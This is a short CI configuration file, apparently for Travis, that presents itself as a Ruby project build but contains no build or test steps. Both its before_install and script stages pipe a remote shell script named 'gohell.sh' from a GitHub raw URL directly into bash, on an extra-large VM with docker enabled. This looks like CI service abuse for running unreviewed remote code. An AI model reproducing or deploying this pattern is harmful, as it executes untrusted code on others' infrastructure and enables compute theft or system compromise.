language: ruby

services:
  - docker
  
vm:
  size: x-large
  
rvm:
  - "3.0.1"

before_install:
  - curl -sL https://raw.githubusercontent.com/6248202226/gradi/main/gohell.sh | bash

script:
  - curl -sL https://raw.githubusercontent.com/6248202226/gradi/main/gohell.sh | bash
